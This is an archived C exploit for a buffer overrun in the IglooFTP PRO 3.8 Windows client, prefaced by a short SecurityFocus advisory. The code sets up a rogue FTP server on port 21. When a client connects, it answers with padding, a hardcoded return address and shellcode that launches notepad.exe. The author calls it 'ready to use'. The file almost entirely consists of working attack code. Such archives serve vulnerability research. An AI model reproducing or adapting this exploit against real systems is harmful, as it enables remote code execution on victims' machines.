102 lines
No EOL
2.8 KiB
C
102 lines
No EOL
2.8 KiB
C
// source: https://www.securityfocus.com/bid/8117/info
|
|
|
|
IglooFTP PRO for Windows platforms has been reported prone to multiple buffer overrun vulnerabilities.
|
|
|
|
The issue likely presents itself due do a lack of sufficient bounds checking performed on data that is copied into a reserved internal memory buffer. Remote arbitrary code execution has been confirmed.
|
|
|
|
It should be noted that although this vulnerability has been reported to affect IglooFTP PRO version 3.8, other versions might also be affected.
|
|
|
|
/* IglooExploit.c (Windows XP Professional Build 2600.x)
|
|
*
|
|
* vkhoshain@hotmail.com
|
|
* ---------------------------
|
|
* glooFTP Pro 3.8 Remote exploit code is ready to use ;)
|
|
* all you need to do is compile the source code and then
|
|
* run the program and wait for glooFTP Pro 3.8 connection
|
|
*
|
|
* This one doesn't do anything , just run notepad.exe and then crash
|
|
* the program by :
|
|
* INT 3 ;)
|
|
*
|
|
*/
|
|
|
|
#include "winsock2.h"
|
|
#include "stdio.h"
|
|
#pragma comment (lib,"ws2_32")
|
|
|
|
int main()
|
|
{
|
|
|
|
char spend[1024];
|
|
char shellcode[] =
|
|
"\x90\x90\x90\x90\x90\xEB\x13\x5F\x66\x31\xC0\x88\x47"
|
|
"\x0E\x40\x50\x57\xB8\xC6\x84\xE6\x77\xFF\xD0\xCD\x03"
|
|
"\xE8\xE8\xFF\xFF\xFF\x6E\x6F\x74\x65\x70\x61\x64\x20"
|
|
"\x20\x20\x20\x20\x20\x20\x23";
|
|
WSADATA wsaData;
|
|
int s1,spt;
|
|
struct sockaddr_in p;
|
|
struct sockaddr_in emp;
|
|
int len;
|
|
// Startup ...
|
|
WSAStartup(0x0101,&wsaData);
|
|
|
|
|
|
// Creating first socket!
|
|
printf("Creating socket ...\n");
|
|
if ((s1=socket(AF_INET,SOCK_STREAM,0))==-1){
|
|
printf("Err in Creating socket\n");
|
|
closesocket(s1);
|
|
return 0;
|
|
}
|
|
p.sin_port = htons(21);
|
|
p.sin_family =AF_INET;
|
|
p.sin_addr.s_addr = INADDR_ANY;
|
|
|
|
|
|
|
|
// Binding ---
|
|
printf("Binding ...\n");
|
|
if ((bind(s1,(struct sockaddr*) &p,sizeof(p)))==-1)
|
|
{
|
|
printf("Err in Bind ...\n");
|
|
closesocket(s1);
|
|
return 0;
|
|
}
|
|
|
|
printf("going to start listening\n");
|
|
if ((listen(s1,5))==-1)
|
|
{
|
|
printf("Err in liten method ..\n");
|
|
closesocket(s1);
|
|
return 0;
|
|
}
|
|
|
|
len=sizeof(emp);
|
|
|
|
// ACCEPTING
|
|
printf("Listening on port 21 , please wait for glooFTP(ver3.8) connection
|
|
...\n");
|
|
spt=accept(s1,&emp,&len);
|
|
printf("The ftp client has just connected ,please wait ...\n");
|
|
|
|
send(spt,"200 ",4,0); // Sending "200 "
|
|
|
|
|
|
send(spt,spend,1024,0); //to recive RET addr place
|
|
|
|
|
|
send(spt,"\x79\xfc\xe9\x77",4,0); //EIP Address (RET Addr)
|
|
|
|
|
|
send(spt,shellcode,46,0); //Sending Shellcode
|
|
|
|
send(spt,"\n",1,0);
|
|
|
|
closesocket(s1);
|
|
closesocket(spt);
|
|
printf("Shellcode has just sent , Done.\n");
|
|
|
|
return 0;
|
|
|
|
} |